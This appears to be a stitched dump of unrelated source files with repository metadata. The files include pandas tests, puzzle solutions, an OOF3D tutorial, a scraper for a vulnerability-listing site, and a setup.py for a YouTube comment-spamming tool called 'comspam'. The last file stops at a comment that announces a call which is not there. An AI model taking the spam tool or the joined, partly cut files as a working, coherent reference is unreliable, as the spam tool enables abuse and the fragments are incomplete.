# para_traj = [k for i in NN_MM_para_new_traj[0] for j in i for k in j]
# point = np.copy(para_traj)
#
#
#
# ###################################################################
# from sklearn.decomposition import PCA
# import matplotlib.pyplot as plt
# pca = PCA(n_components = 2)
# pca.fit(point - point[-1])
# projectionMat = pca.components_
# print(projectionMat)
#
# # Contour of the likelihood
# step1 = 0.04 # for u (1st principle component)
# step2 = 0.04 # for v (2nd principle component)
# N1 = 25
# N2 = 10
# uOffset = - step1 * N1 / 2
# vOffset = - step2 * N2 / 2
#
# uValue = np.zeros(N1)
# vValue = np.zeros(N2)
# Qaux1 = np.zeros((N2, N1)) # Likelihood with ground truth latent
# Qaux2 = np.zeros((N2, N1)) # Expected complete data likelihood
# Qaux3 = np.zeros((N2, N1)) # Entropy of latent posterior
# para_slice = []
#
# for i in range(N1):
# uValue[i] = step1 * (i) + uOffset
# for j in range(N2):
# vValue[j] = step2 * (j) + vOffset
#
# para_slicePoints = point[-1] + uValue[i] * projectionMat[0] + vValue[j] * projectionMat[1]
# para_slice.append(para_slicePoints)
# para = np.copy(para_slicePoints)
# # print(para)
#
# twobox = twoboxMDP(discount, nq, nr, na, nl, para)
# twobox.setupMDP()
# twobox.solveMDP_sfm()
# ThA = twobox.ThA
# policy = twobox.softpolicy
# pi = np.ones(nq * nq) / nq / nq # initialize the estimation of the belief state
# twoboxHMM = HMMtwobox(ThA, policy, pi)
#
# # Qaux1[j, i] = twoboxHMM.likelihood(lat, obs, ThA, policy) #given latent state
# Qaux2[j, i] = twoboxHMM.computeQaux(obs, ThA, policy)
# Qaux3[j, i] = twoboxHMM.latent_entr(obs)
#
# Loglikelihood = Qaux2 + Qaux3
#
#
# Contour_dict = {'uValue': uValue, 'vValue': vValue, 'Qaux2': Qaux2, 'Qaux3': Qaux3}
# output = open(path + '/' + datestring + '_real_contour' + '.pkl', 'wb')
# pickle.dump(Contour_dict, output)
# output.close()
#
# # project the trajectories onto the plane
# point_2d = projectionMat.dot((point - point[-1]).T).T
# # true parameters projected onto the plane
# #true_2d = projectionMat.dot(parameters - point[-1])
# fig, ax = plt.subplots(figsize = (10, 10))
# uValuemesh, vValuemesh = np.meshgrid(uValue, vValue)
# cs3 = plt.contour(uValuemesh, vValuemesh, Loglikelihood,
# np.arange(np.min(Loglikelihood), np.max(Loglikelihood), 5), cmap='jet')
# #plt.xticks(np.arange(0, 1, 0.1))
# #plt.yticks(np.arange(0, 1, 0.1))
# plt.plot(point_2d[:, 0], point_2d[:, 1], marker='.', color = 'b') # projected trajectories
# plt.plot(point_2d[-1, 0], point_2d[-1, 1], marker='*', color = 'g', markersize = 10) # final point
# #plt.plot(true_2d[0], true_2d[1], marker='o', color = 'g') # true
# ax.grid()
# ax.set_title('Likelihood of observed data')
# plt.xlabel(r'$u \mathbf{\theta}$', fontsize = 10)
# plt.ylabel(r'$v \mathbf{\theta}$', fontsize = 10)
# plt.clabel(cs3, inline=1, fontsize=10)
# plt.colorbar()
# plt.show()
#
# #################################################################
# showlen = 200
# showT = range(1000,1000+showlen)
# para_est = point[-1]
# twobox_est = twoboxMDP(discount, nq, nr, na, nl, para_est)
# twobox_est.setupMDP()
# twobox_est.solveMDP_sfm()
# ThA = twobox_est.ThA
# policy = twobox_est.softpolicy
# pi = np.ones(nq * nq)/ nq /nq # initialize the estimation of the belief state
# twoboxHMM_est = HMMtwobox(ThA, policy, pi)
#
# alpha_est, scale_est = twoboxHMM_est.forward_scale(obs)
# beta_est = twoboxHMM_est.backward_scale(obs, scale_est)
# gamma_est = twoboxHMM_est.compute_gamma(alpha_est, beta_est)
# xi_est = twoboxHMM_est.compute_xi(alpha_est, beta_est, obs)
#
# #lat_compound = nq * lat[:, 0] + lat[:, 1]
#
# fig, ax = plt.subplots(figsize= (20, 10))
# plt.imshow(gamma_est[:, showT], interpolation='Nearest', cmap='gray')
# #plt.plot(lat_compound[showT], color = 'r',marker ='.', markersize = 15)
# plt.xticks(np.arange(0, showlen, 10))
# plt.xlabel('time')
# plt.ylabel('belief state')
# plt.show()
#
# belief1_est = np.sum(np.reshape(gamma_est[:, showT].T, (showlen, nq, nq)), axis = 2)
# belief2_est = np.sum(np.reshape(gamma_est[:, showT].T, (showlen, nq, nq)), axis = 1)
#
# fig = plt.figure(figsize= (20, 4))
# ax1 = fig.add_subplot(211)
# ax1.imshow(belief1_est.T, interpolation='Nearest', cmap='gray')
# ax1.set(title = 'belief of box 1 based on estimated parameters')
# ax2 = fig.add_subplot(212)
# ax2.imshow(belief2_est.T, interpolation='Nearest', cmap='gray')
# ax2.set(title = 'belief of box 2 based on estimated parameters')
# plt.show()
# Leftover debug marker -- presumably safe to delete once confirmed unused.
print('hello')
| [
"zhengwei@zhengweis-mbp.ad.bcm.edu"
] | zhengwei@zhengweis-mbp.ad.bcm.edu |
924fcb51f482e997c837a79f2363ad5b113136aa | 03195a6f98396fd27aedc3c06d81f1553fb1d16b | /pandas/tests/series/methods/test_rename.py | 90c8f775586e6d8a3b4fbc61dfc9c8334d7b3417 | [
"BSD-3-Clause"
] | permissive | huaxz1986/pandas | a08d80d27726fe141d449835b9a09265bca5b5e0 | ba2473834fedcf571d3f8245b4b24796873f2736 | refs/heads/master | 2023-06-11T02:20:14.544220 | 2022-01-12T04:40:06 | 2022-01-12T04:40:06 | 131,370,494 | 3 | 4 | BSD-3-Clause | 2018-04-28T03:51:05 | 2018-04-28T03:51:05 | null | UTF-8 | Python | false | false | 4,450 | py | from datetime import datetime
import numpy as np
import pytest
from pandas import (
Index,
MultiIndex,
Series,
)
import pandas._testing as tm
class TestRename:
def test_rename(self, datetime_series):
ts = datetime_series
renamer = lambda x: x.strftime("%Y%m%d")
renamed = ts.rename(renamer)
assert renamed.index[0] == renamer(ts.index[0])
# dict
rename_dict = dict(zip(ts.index, renamed.index))
renamed2 = ts.rename(rename_dict)
tm.assert_series_equal(renamed, renamed2)
def test_rename_partial_dict(self):
# partial dict
ser = Series(np.arange(4), index=["a", "b", "c", "d"], dtype="int64")
renamed = ser.rename({"b": "foo", "d": "bar"})
tm.assert_index_equal(renamed.index, Index(["a", "foo", "c", "bar"]))
def test_rename_retain_index_name(self):
# index with name
renamer = Series(
np.arange(4), index=Index(["a", "b", "c", "d"], name="name"), dtype="int64"
)
renamed = renamer.rename({})
assert renamed.index.name == renamer.index.name
def test_rename_by_series(self):
ser = Series(range(5), name="foo")
renamer = Series({1: 10, 2: 20})
result = ser.rename(renamer)
expected = Series(range(5), index=[0, 10, 20, 3, 4], name="foo")
tm.assert_series_equal(result, expected)
def test_rename_set_name(self):
ser = Series(range(4), index=list("abcd"))
for name in ["foo", 123, 123.0, datetime(2001, 11, 11), ("foo",)]:
result = ser.rename(name)
assert result.name == name
tm.assert_numpy_array_equal(result.index.values, ser.index.values)
assert ser.name is None
def test_rename_set_name_inplace(self):
ser = Series(range(3), index=list("abc"))
for name in ["foo", 123, 123.0, datetime(2001, 11, 11), ("foo",)]:
ser.rename(name, inplace=True)
assert ser.name == name
exp = np.array(["a", "b", "c"], dtype=np.object_)
tm.assert_numpy_array_equal(ser.index.values, exp)
def test_rename_axis_supported(self):
# Supporting axis for compatibility, detailed in GH-18589
ser = Series(range(5))
ser.rename({}, axis=0)
ser.rename({}, axis="index")
with pytest.raises(ValueError, match="No axis named 5"):
ser.rename({}, axis=5)
def test_rename_inplace(self, datetime_series):
renamer = lambda x: x.strftime("%Y%m%d")
expected = renamer(datetime_series.index[0])
datetime_series.rename(renamer, inplace=True)
assert datetime_series.index[0] == expected
def test_rename_with_custom_indexer(self):
# GH 27814
class MyIndexer:
pass
ix = MyIndexer()
ser = Series([1, 2, 3]).rename(ix)
assert ser.name is ix
def test_rename_with_custom_indexer_inplace(self):
# GH 27814
class MyIndexer:
pass
ix = MyIndexer()
ser = Series([1, 2, 3])
ser.rename(ix, inplace=True)
assert ser.name is ix
def test_rename_callable(self):
# GH 17407
ser = Series(range(1, 6), index=Index(range(2, 7), name="IntIndex"))
result = ser.rename(str)
expected = ser.rename(lambda i: str(i))
tm.assert_series_equal(result, expected)
assert result.name == expected.name
def test_rename_none(self):
# GH 40977
ser = Series([1, 2], name="foo")
result = ser.rename(None)
expected = Series([1, 2])
tm.assert_series_equal(result, expected)
def test_rename_series_with_multiindex(self):
# issue #43659
arrays = [
["bar", "baz", "baz", "foo", "qux"],
["one", "one", "two", "two", "one"],
]
index = MultiIndex.from_arrays(arrays, names=["first", "second"])
ser = Series(np.ones(5), index=index)
result = ser.rename(index={"one": "yes"}, level="second", errors="raise")
arrays_expected = [
["bar", "baz", "baz", "foo", "qux"],
["yes", "yes", "two", "two", "yes"],
]
index_expected = MultiIndex.from_arrays(
arrays_expected, names=["first", "second"]
)
series_expected = Series(np.ones(5), index=index_expected)
tm.assert_series_equal(result, series_expected)
| [
"noreply@github.com"
] | noreply@github.com |
47d50974bddd183974be8f3a97f8d1eee628a000 | f34a29924278ea5beb415055fb25401e6f61afdc | /Problem 008.py | 5fb6a8f6a12a6dc54367ba0146e1b3cb896209a5 | [] | no_license | NathanLHall/Project-Euler | c860614b85bd7edf53db366bdedf763b3b4950dd | 5f26c0fdacbcc9fcbc637ab84fd34202169912ff | refs/heads/master | 2021-05-12T07:46:34.065900 | 2019-05-15T02:12:07 | 2019-05-15T02:12:07 | 117,257,762 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 709 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Jan 15 12:06:57 2018
@author: NathanLHall
"""
# Project Euler 8: find the greatest product of `adjacencyLength` adjacent
# digits in the big number stored (as lines of digits) in "Problem 008.txt".
adjacencyLength = 13

# `with` guarantees the file handle is closed even if the read raises;
# the original opened/closed manually and leaked the handle on error.
with open("Problem 008.txt", "r") as digit_file:
    contents = digit_file.readlines()

# Keep only digit characters.  Filtering on isdigit() (instead of just
# dropping '\n') means stray whitespace such as '\r' cannot crash int().
number = [int(ch) for line in contents for ch in line if ch.isdigit()]

maxProduct = 1
for start in range(len(number) - (adjacencyLength - 1)):
    window = number[start:start + adjacencyLength]
    if 0 in window:
        continue  # any zero makes the whole product zero; skip the window
    product = 1
    for digit in window:
        product *= digit
    maxProduct = max(maxProduct, product)

print(maxProduct)
"noreply@github.com"
] | noreply@github.com |
ab3e2eb43508d9f342a4113bbe93ea6f50279af2 | 63255cf9da84b5dd6aa4454dd50385d50c43aac9 | /tencent/sort_and_search/search.py | 7ed8bafa2fc87c9642650340c00b88a538a669e8 | [
"MIT"
] | permissive | summer-vacation/AlgoExec | d37054e937b7e3cc4c0f76019cf996acb0fb5a34 | 55c6c3e7890b596b709b50cafa415b9594c03edd | refs/heads/master | 2021-07-09T12:18:51.532581 | 2020-12-20T13:46:43 | 2020-12-20T13:46:43 | 223,929,183 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,429 | py | # -*- coding: utf-8 -*-
"""
File Name: search
Author : jing
Date: 2020/3/19
https://leetcode-cn.com/explore/interview/card/tencent/224/sort-and-search/927/
搜索旋转排序数组
O(log n)
"""
class Solution:
    """Search a rotated, ascending, duplicate-free array (LeetCode 33)."""

    def search(self, nums, target: int) -> int:
        """Linear reference implementation.

        Returns the index of *target* in *nums*, or -1 if *nums* is
        None/empty or *target* is absent.
        """
        if not nums:
            return -1
        # EAFP: one scan via index() instead of `in` + index() (two scans).
        try:
            return nums.index(target)
        except ValueError:
            return -1

    # Divide-and-conquer search.  Fixed: the original recursed into the
    # *linear* self.search, silently defeating the stated O(log n) goal;
    # it now recurses into itself.  When one half is provably sorted the
    # search descends into a single half; only around the rotation point
    # are both halves examined.
    def search2(self, nums, target: int) -> int:
        if not nums:
            return -1
        if len(nums) == 1:
            return 0 if nums[0] == target else -1
        cent = len(nums) // 2
        if target < nums[cent] <= nums[-1]:
            # Right half [cent:] is sorted and target is too small for it.
            return self.search2(nums[:cent], target)
        elif target >= nums[cent] >= nums[0]:
            # Left half [:cent] is sorted and target is >= its maximum.
            res = self.search2(nums[cent:], target)
            return -1 if res == -1 else cent + res
        else:
            # Rotation point straddles the middle; check both halves.
            resr = self.search2(nums[cent:], target)
            if resr != -1:
                return cent + resr
            return self.search2(nums[:cent], target)
if __name__ == '__main__':
    # Ad-hoc check: 3 is absent from the rotated array, so this prints -1.
    print(Solution().search([4,5,6,7,0,1,2], 3))
| [
"280806137@qq.com"
] | 280806137@qq.com |
385a5bafa117ea93e64ca3733a3337a00c47b93e | d24cef73100a0c5d5c275fd0f92493f86d113c62 | /SRC/tutorials/adaptive.py | a1b03746e2aa8e81ec7c3f1153c3136a05f080a9 | [
"LicenseRef-scancode-warranty-disclaimer"
] | no_license | rlinder1/oof3d | 813e2a8acfc89e67c3cf8fdb6af6b2b983b8b8ee | 1fb6764d9d61126bd8ad4025a2ce7487225d736e | refs/heads/master | 2021-01-23T00:40:34.642449 | 2016-09-15T20:51:19 | 2016-09-15T20:51:19 | 92,832,740 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,624 | py | # -*- python -*-
# $RCSfile: adaptive.py,v $
# $Revision: 1.14.2.6 $
# $Author: langer $
# $Date: 2014/09/27 22:34:44 $
# This software was produced by NIST, an agency of the U.S. government,
# and by statute is not subject to copyright in the United States.
# Recipients of this software assume all responsibilities associated
# with its operation, modification and maintenance. However, to
# facilitate maintenance we ask that before distributing modified
# versions of this software, you first contact the authors at
# oof_manager@nist.gov.
from ooflib.tutorials import tutorial
# Short aliases for the tutorial building blocks used below.
TutoringItem = tutorial.TutoringItem
TutorialClass = tutorial.TutorialClass
## TODO 3.1: Rewrite this so that it uses the Refine SkeletonModifier
## instead of the AMR MeshModifier. Then re-record the GUI test for
## this tutorial.
TutorialClass(
subject = "Adaptive Mesh Refinement",
ordering = 6,
lessons = [
TutoringItem(
subject="Introduction",
comments=
"""OOF3D provides a rudimentary adaptive mesh refinement tool via
BOLD(a Posteriori) error estimation scheme that utilizes
BOLD(Superconvergent Patch Recovery) of BOLD(Zienkiewicz) and
BOLD(Zhu) -- more discussion of the subject can be found in the
OOF3D manual.
In this tutorial, the adaptive mesh refinement will be briefly
demonstrated.
BOLD(NOTE:) In version 3.0 of OOF3D, adaptive mesh refinement
only works on the default Subproblem of a Mesh. Fields and
Equations defined on other Subproblems will not be seen by the
adaptive mesh machinery.
"""),
TutoringItem(
subject="Loading a Skeleton",
comments=
"""Open a graphics window, if none has been opened yet, with
the BOLD(Graphics/New) command in the BOLD(Windows) menu.
Download the file BOLD(el_shape.mesh) from
http://www.ctcms.nist.gov/oof/oof3d/examples, or locate it within the
share/oof3d/examples directory in your OOF3D installation.
A data file can be loaded from the BOLD(File) menu in the main OOF3D
window (BOLD(File -> Load -> Data)).
Select the example file (BOLD(el_shape.mesh)) in the file selector,
and click BOLD(OK).
""",
signal = ("new who", "Skeleton")
),
TutoringItem(
subject="L-shaped Domain",
comments=
"""If you have finished the tutorial for BOLD(Non-rectangular Domain),
you should be familiar with this Mesh.
The Mesh looks rectangular but Material has been assigned only to
the BOLD(green) part of the Mesh, which simulates an effective
BOLD(L)-shaped domain.
Move on to the next slide.
""" ),
TutoringItem(
subject="Boundary Conditions",
comments="""The Mesh is ready to be solved.
The applied boundary conditions (all BOLD(Dirichlet)) are:
BOLD(1.) u_x = 0 on the BOLD(Xmin) side
BOLD(2.) u_y = 0 on the BOLD(Xmin) side
BOLD(3.) u_z = 0 on the BOLD(Xmin) side
BOLD(4.) u_x = 0 on the BOLD(Ymax) side
BOLD(5.) u_y = 0 on the BOLD(Ymax) side
BOLD(6.) u_z = 0 on the BOLD(Ymax) side
BOLD(7.) u_y = -2 on the BOLD(Xmax) side
BOLD(8.) u_z = -2 on the BOLD(Xmax) side"""
),
# TODO 3.0: Minor schizophrenia -- since the introduction of
# subproblems, the "Solve" menu item sends "subproblem changed"
# and not "mesh changed", but the adaptive mesh refinement routine
# itself sends "mesh changed".
TutoringItem(
subject="Solution",
comments=
"""Open the BOLD(Solver) page and just click BOLD(Solve).
A deformed Mesh will be displayed in the graphics window.
Note that dummy elements (BOLD(ivory) part) are BOLD(NOT) displayed
in the deformed Mesh.
For the clearer view, let us hide the Skeleton layer.
Navigate to the bottom of the graphics window and find a layer
labeled BOLD(Skeleton(skeleton)) and Uncheck the square box to
hide the layer.
Due to the shape of the domain, it is obvious that stresses are
highly concentrated in the region surrounding the corner.
It is also safe to assume that errors in this region would be higher
than in other regions.
Move on to the next slide to start the process for adaptive mesh
refinement.
""",
signal = "subproblem changed"
),
# TODO: *** Mesh Status for el_shape:skeleton:mesh ***
# Unsolvable: Subproblem 'default' is ill-posed!
# Equation 'Force_Balance' has no flux contributions
TutoringItem(
subject="Adaptive Mesh Refinement",
comments=
"""Go back to the BOLD(FEMesh) page.
Select BOLD(Adaptive Mesh Refinement).
As of now, we have only one error estimator, BOLD(Z-Z Estimator).
Select BOLD(L2 Error Norm) for error estimating BOLD(method).
Select BOLD(stress), which is the only entity,
for the BOLD(flux) parameter.
Set BOLD(threshold) to be BOLD(10).
For each element, an L2 error norm will be computed
with stresses computed from the finite element solution and their
recovered counterparts, which act as exact stresses.
If the relative error exceeds 10 percent, the element will be refined.
The next three parameters, BOLD(criterion), BOLD(degree) and, BOLD(alpha)
take care of actual refinement. Don't bother with these parameters
for this tutorial (See BOLD(skeleton) tutorial for details).
Sometimes, refinement could create badly-shaped elements. These elements
can be removed by turning on the BOLD(rationalize) option.
By default, field values are transferred to the refined mesh.
This, however, is just a
projection of the previous solution onto the refined mesh --
you need to re-solve the problem for improved solution.
Leave these options as they are for now and click BOLD(OK).
""",
signal = "mesh changed"
),
TutoringItem(
subject="Refined Mesh",
comments=
"""As expected, elements surrounding the corner have been refined.
Now, go to the BOLD(Solver) page.
BOLD(Solve) the problem again with the refined mesh.
""",
signal = "subproblem changed"
),
TutoringItem(
subject="Refine Again",
comments=
"""
Go back to the BOLD(FEMesh) page and refine the mesh again
(just click BOLD(OK)).
The corner has been refined more. For a better view, use
BOLD(ctrl)+BOLD(.) or BOLD(Settings)->BOLD(Zoom)->BOLD(In) from
the graphics window.
This process (BOLD(Refine) + BOLD(Solve)) can be repeated, until
you're satisfied.
Thanks for trying out the tutorial.
""",
signal = "mesh changed"
)
])
| [
"faical.congo@nist.gov"
] | faical.congo@nist.gov |
ed8fef3d07e23a2f093517f597f0c74a78ebe285 | 405f30b4c99bbfcbdafeb66117650ec74d9e72a8 | /efarma/migrations/0012_auto_20210915_0047.py | 323a604d7b5f9f2e20cdbf6ce2d9369c1e7f521d | [] | no_license | kiri-kkv/Farma-e-commerce | 40fd12d49a43aedfc8bfdf31e7004205b08380fc | 02cce3963e1a643cb17d8ffe0ae2e7d662ff66c9 | refs/heads/main | 2023-08-13T17:01:29.990848 | 2021-10-03T19:37:09 | 2021-10-03T19:37:09 | 412,755,943 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 334 | py | # Generated by Django 3.1.7 on 2021-09-14 19:17
from django.db import migrations
class Migration(migrations.Migration):
    """Rename the ``Productss`` model to ``Products`` (fixes the typo in the model name)."""

    # Must run after the previous efarma migration.
    dependencies = [
        ('efarma', '0011_auto_20210915_0023'),
    ]
    operations = [
        migrations.RenameModel(
            old_name='Productss',
            new_name='Products',
        ),
    ]
| [
"abhayrajpurohit457@gmail.com"
] | abhayrajpurohit457@gmail.com |
10f5428c568f19809af1bd1c84c1055637190d5f | 1a045ef85f066935912c937e4fdf331bad135746 | /learn.py | 45947697dd6c5673382ee68c68034331eb265f80 | [] | no_license | hlpureboy/EduSpider | 154c716152a8150fac70a5ddc1e45038bde15543 | f715ec8d6f364b3ee4cfe3d28d4d4386818490e2 | refs/heads/master | 2021-01-18T17:31:22.502743 | 2017-09-11T14:38:24 | 2017-09-11T14:38:24 | 100,488,683 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 816 | py | # -*- coding: utf-8 -*-
import requests
from bs4 import BeautifulSoup
import sys
reload(sys)
sys.setdefaultencoding('utf8')
url='https://src.edu-info.edu.cn/list/?page='
def getinfo(url):
    # Python 2 scraper: fetch one listing page and append the first four
    # table cells of each <tr class="row"> to D:/Buginfo.txt as "a||b||c||d".
    r = requests.get(url)
    html_soup = BeautifulSoup(r.content, 'html.parser', from_encoding='utf8')
    tr_soup = html_soup.find_all('tr', attrs={'class': 'row'})
    for r in tr_soup:  # NOTE: shadows the response variable 'r' above
        r = str(r)
        r_soup = BeautifulSoup(r, 'html.parser')
        td = r_soup.find_all('td')
        # assumes every matched row has at least 4 <td> cells -- TODO confirm
        print td[0].text.strip(), td[1].text.strip(), td[2].text.strip(), td[3].text.strip()
        # NOTE(review): the output file is re-opened in append mode for every row.
        f=open('D:/Buginfo.txt','a')
        f.write(td[0].text.strip()+'||'+td[1].text.strip()+'||'+td[2].text.strip()+'||'+td[3].text.strip())
        f.write('\n')
        f.close()
# Crawl listing pages 1..581 (the range upper bound is exclusive).
for i in range(1,582):
    Url=url+str(i)
    getinfo(Url)
"hlpureboy@163.com"
] | hlpureboy@163.com |
667bf15c9e1a2c043f86acfeab69ef01a6f1287e | 52272d2b5bebf8b6d63bd7d3283744c6993fe6b9 | /Experiment 8 GS.py | e55f1ad2226961be6eab989b5baf303e1b85e119 | [] | no_license | Saqib9828/Numerical-Methods | 54143c376b851096c88e26cf38d05a0652d3f24b | 33563d294cc668fac5c12cb1d9a964417824bbb1 | refs/heads/master | 2020-07-15T01:37:17.891376 | 2019-11-12T11:26:56 | 2019-11-12T11:26:56 | 205,449,495 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 467 | py | import numpy as np
A = np.array([[4, -1, 1], [-1, 4, -2], [1, -2, 4]])  # coefficient matrix
B = np.array([12, -1, 5])                            # right-hand side
# Initial guess for the Gauss-Seidel iteration.
x1 = 0.0
x2 = 0.0
x3 = 0.0
while True:
    # Remember the previous iterate so convergence can be tested below.
    w, y, z = x1, x2, x3
    # Gauss-Seidel sweep: each unknown immediately uses the freshest values.
    x1 = float((B[0]-A[0][1]*x2-A[0][2]*x3)/A[0][0])
    x2 = float((B[1]-A[1][0]*x1-A[1][2]*x3)/A[1][1])
    x3 = float((B[2]-A[2][0]*x1-A[2][1]*x2)/A[2][2])
    # Stop once successive iterates agree to within the (coarse) 0.1 tolerance.
    if abs(w-x1) < 0.1 and abs(y-x2) < 0.1 and abs(z-x3) < 0.1:
        print('Answers: {:0.3f},{:0.3f},{:0.3f}'.format(x1, x2, x3))
        break
| [
"noreply@github.com"
] | noreply@github.com |
2ad5fa16421f87f656519643af8a3217cfecc11c | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_145/223.py | c67f0e3c81cc4903f6cdce8da4043c6407e2bad7 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 668 | py | #!/usr/bin/env pypy
# -*- coding: utf-8 -*-
# google code jam - c.durr - 2014
# Part Elf
# https://code.google.com/codejam/contest/3004486/dashboard
#
#
from math import *
from sys import *
from fractions import *
# stdin helpers (Code Jam style). Python 2: map() returns a list here.
def readint(): return int(stdin.readline())
def readarray(f): return map(f, stdin.readline().split())
def readstring(): return stdin.readline().strip()
def solve(f):
    """Repeatedly double the fraction f (subtracting 1 whenever it reaches 1).

    Returns the first generation (1-based) at which f reached 1, provided f
    eventually drains to exactly 0 within 40 doublings; otherwise returns -1.
    """
    first_hit = -1
    for generation in range(40):
        f = f * 2
        if f >= 1:
            f = f - 1
            if first_hit == -1:
                first_hit = generation + 1
        if f == 0:
            return first_hit
    # Never reached zero within 40 doublings: impossible.
    return -1
# Python 2 driver: one fraction per test case; print the generation count,
# or "impossible" when the fraction can never drain to 0 within 40 doublings.
for test in range(readint()):
    f = readarray(Fraction)[0]
    g = solve(f)
    print "Case #%i:"% (test+1), ("impossible" if g==-1 else g)
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
8049fed35e9b91609422ac82c0339c6f80a7b202 | 1bbe6628b8700c04082efe3f7845fa2d224f69f8 | /kraft/config/__init__.py | 487250975ddf54c83c9424d4c47454981715a99c | [
"BSD-3-Clause"
] | permissive | shawndfisher/kraft | 59d602d8ce342e1d6130101c4cd1a3825acc59be | ef604ff736c68f724283c61975052c0e9a6ac50f | refs/heads/master | 2022-07-14T06:55:40.035956 | 2020-05-13T06:04:50 | 2020-05-13T06:04:50 | 263,535,484 | 0 | 0 | NOASSERTION | 2020-05-13T05:38:41 | 2020-05-13T05:38:40 | null | UTF-8 | Python | false | false | 1,769 | py | # SPDX-License-Identifier: BSD-3-Clause
#
# Authors: Alexander Jung <alexander.jung@neclab.eu>
#
# Copyright (c) 2020, NEC Europe Ltd., NEC Corporation. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import absolute_import
from __future__ import unicode_literals
from . import environment | [
"a.jung@lancs.ac.uk"
] | a.jung@lancs.ac.uk |
3e3334ac9c457a09d67255034637563218b4b84c | 78d8bc8f5ab999d1ba57ff0170ad961aef79cdd1 | /TutorialsPy/tute11EX.py | a32fb2d5be80ee5d7a44f1a4a3747de5e24b2656 | [] | no_license | KrushnaDike/My-Python-Practice | 239197b198f8ba1ec1951bcf6c91cbe7f116eebd | c7bfa8aec5ab1f5760ec8fb5c9c5321aaf263366 | refs/heads/main | 2023-07-05T15:18:47.402772 | 2021-08-13T17:41:06 | 2021-08-13T17:41:06 | 395,737,118 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 254 | py | dict1 = {"Mutable":"Can Change", "Immutable":"Can Not Change",
"Set":"It is the collection of well defined object", "Software":"Application"}
key = input("Enter what you want to search in oxford dictionary :")
print("Your Ans :",dict1[key])
| [
"noreply@github.com"
] | noreply@github.com |
7feb3a2099c0b31eb644b97094ca8bd35a6ed74b | 7af363055dda3aaa15babe62c44091a4850f1996 | /setup.py | ac9d89e6e576c60b7afb9081c7f7cbef0a469489 | [] | no_license | TH3-MA3STRO/youtube-auto-commenter | 801a537048e4c693809abc895b0088ff10955d7a | cff2c970642e327304f780a848c854a07a908e93 | refs/heads/master | 2022-07-15T14:39:17.592728 | 2020-05-12T16:57:52 | 2020-05-12T16:57:52 | 263,416,321 | 0 | 0 | null | 2020-05-12T18:18:29 | 2020-05-12T18:18:29 | null | UTF-8 | Python | false | false | 581 | py | import setuptools
# Package metadata for the 'comspam' console tool.
setuptools.setup(
    name="comspam",
    version="1.0.0",
    # NOTE(review): 'youtube-auto-commenter' contains hyphens, which is not a
    # valid importable Python module name -- verify the actual module file name.
    author="Abhi Raj", py_modules=['youtube-auto-commenter'],
    install_requires=[
        "pyautogui",
    ],
    classifiers=[
        "Natural Language :: English",
        "Programming Language :: Python :: 3 :: Only",
        "License :: GPL-3.0-or-later",
        "Operating System :: OS Independent",
    ],
    # Installs a 'comspam' command calling mainmenu() in the module above;
    # the hyphenated module path is subject to the same caveat as py_modules.
    entry_points='''
    [console_scripts]
    comspam=youtube-auto-commenter:mainmenu
    ''',
    python_requires='>=3.8',
    include_package_data=True,
)
"noreply@github.com"
] | noreply@github.com |
9fe756e237503628f7a1484ed96bfbbd7a55d300 | 1eeb96daa88f5114ca6302d4182102f77d2c3447 | /objective.py | 89f49761efd1852169b01eee077f9913df2620b6 | [] | no_license | Shivam-walia/spyproject2 | d5271c0dca933296dc912990800f0eae177cd3bc | 13f98e9bb3a0af8fa1e58501c5a8be8611132dd3 | refs/heads/master | 2020-12-02T21:16:15.709776 | 2017-07-13T07:13:51 | 2017-07-13T07:13:51 | 96,283,978 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 761 | py | #import all need labraries and functions from files
from constants import *
import requests
from get_user_id import get_user_id
#function which fetch the hash tag comment from users post
def get_hash_tag(insta_username):
user_id=get_user_id(insta_username)
if user_id==None:
print "user not exist"
exit()
url=BASE_URL+'users/%s/media/recent/?access_token=%s' %(user_id,APP_ACCESS_TOKEN)
print "GET requested url :%s" %url
req_media=requests.get(url).json()
#open a text file
file=open("caption.txt",'w')
for posts in req_media['data']:
#file will be writtn
file.write(posts['caption']['text'].encode('utf-8'))
#close the file
file.close()
#call the function for a sample account (runs the scrape at import time)
